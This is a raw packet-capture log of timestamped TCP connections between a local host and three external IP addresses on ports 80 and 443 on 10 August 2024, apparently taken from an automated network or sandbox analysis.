Aug 10, 2024 16:12:23.760205984 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.760215998 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.760226965 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.760236979 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.760237932 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.760237932 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.760252953 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.760267973 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.760272980 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.760278940 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.760288954 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.760299921 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.760325909 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.760325909 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.760325909 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.760344028 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.760530949 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.760540962 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.760550976 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.760598898 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.760687113 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.760688066 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.760699034 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.760711908 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.760725975 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.760739088 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.760752916 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.760762930 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.760771990 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.760785103 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.760792971 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.760792971 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.760792971 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.760797024 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.760818005 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.760829926 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.760843039 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.760855913 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.760873079 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.760873079 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.760874033 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.760891914 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.760914087 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.761244059 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.761255026 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.761265039 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.761388063 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.761388063 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.761393070 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.761403084 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.761408091 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.761413097 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.761423111 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.761432886 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.761444092 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.761457920 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.761512041 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.761523008 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.761532068 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.761542082 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.761550903 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.761550903 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.761552095 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.761564016 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.761570930 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.761574984 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.761585951 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.761593103 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.761595964 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.761607885 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.761611938 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.761642933 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.761642933 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.762154102 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.762166023 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.762175083 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.762186050 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.762196064 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.762204885 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.762207985 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.762214899 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.762221098 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.762228966 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.762238979 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.762243986 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.762248993 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.762260914 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.762270927 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.762278080 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.762278080 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.762294054 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.762327909 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.768927097 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:23.768956900 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:23.769021988 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:23.769069910 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:23.769108057 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:23.769129992 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:23.770287991 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:23.770313025 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:23.770360947 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:23.770375013 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:23.770401955 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:23.770464897 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:23.771025896 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.771042109 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.771075964 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.771080971 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.771130085 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.771130085 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.771661043 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:23.771682978 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:23.771733046 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:23.771744967 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:23.771771908 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:23.771795988 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:23.771909952 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.771925926 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.772026062 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.772030115 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.772224903 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.772522926 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.772536993 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.772593021 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.772598028 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.772826910 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.773432970 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.773463964 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.773566008 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.773566008 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.773566008 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.773570061 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.773648024 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.773937941 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.773948908 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.773958921 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.773967028 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.773969889 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.773979902 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.773979902 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.773992062 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.774003983 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.774070978 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.774075031 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.774079084 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.774095058 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.774224043 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.774389029 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.774399996 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.774410963 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.774420977 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.774426937 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:23.774431944 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.774444103 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.774455070 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:23.774456024 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.774466038 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.774477959 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.774499893 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:23.774525881 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:23.774538994 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:23.774565935 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.774590015 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:23.774765968 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.774776936 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.774785995 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.774795055 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.774806023 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.774812937 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.774822950 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.774833918 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.774840117 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.774849892 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.774859905 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.774867058 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.774883986 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.774890900 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.774904966 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.774915934 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.774930000 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.774934053 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.774945974 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.774950981 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.774962902 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.774966955 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.774982929 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.775033951 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.775072098 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.775090933 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.775101900 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.775109053 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.775120020 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.775125027 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.775140047 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.775144100 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.775151968 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.775161028 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.775171995 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.775190115 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.775221109 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.775407076 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.775417089 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.775427103 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.775438070 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.775449991 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.775458097 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.775470972 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.775477886 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.775499105 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.775523901 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.775563002 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.775573015 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.775582075 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.775593996 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.775598049 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.775604010 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.775613070 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.775613070 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.775623083 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.775631905 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.775644064 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.775652885 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.775665998 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.775676012 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.775686026 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.775686026 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.775691032 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.775693893 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.775702953 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.775713921 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.775721073 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.775747061 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.775763035 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.775767088 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.776268959 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.776279926 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.776288986 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.776300907 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.776312113 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.776318073 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.776330948 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.776340008 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.776355028 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.776360035 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.776376009 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.776381969 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.776393890 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.776397943 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.776407003 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.776417971 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.776423931 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.776436090 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.776441097 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.776449919 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.776463985 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.776468992 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.776478052 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.776490927 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.776501894 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.776513100 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.776519060 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.776541948 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.776550055 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.776559114 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.776592016 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.777084112 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.777095079 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.777102947 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.777110100 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.777115107 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.777124882 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.777137995 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.777158022 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.777168989 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.777178049 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.777189016 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.777196884 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.777213097 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.777215958 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.777220011 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.777235031 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.777349949 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.777615070 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.777626038 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.777633905 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.777643919 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.777654886 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.777664900 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.777673006 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.777683020 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.777693033 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.777699947 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.777709007 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.777719021 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.777724981 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.777740002 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.777744055 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.777753115 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.777764082 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.777770042 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.777779102 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.777786016 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.777795076 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.777805090 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.777820110 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.777823925 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.777846098 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.777865887 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.777932882 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.777949095 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.777966976 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.777977943 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.778004885 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.778033018 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.778112888 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.778131962 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.778142929 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.778151989 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.778162956 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.778175116 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.778181076 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.778192043 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.778198957 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.778208017 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.778218985 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.778228045 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.778237104 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.778270006 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.778280020 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.778295994 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.778321028 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.821981907 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.821997881 CEST	443	49754	162.159.130.233	192.168.2.4
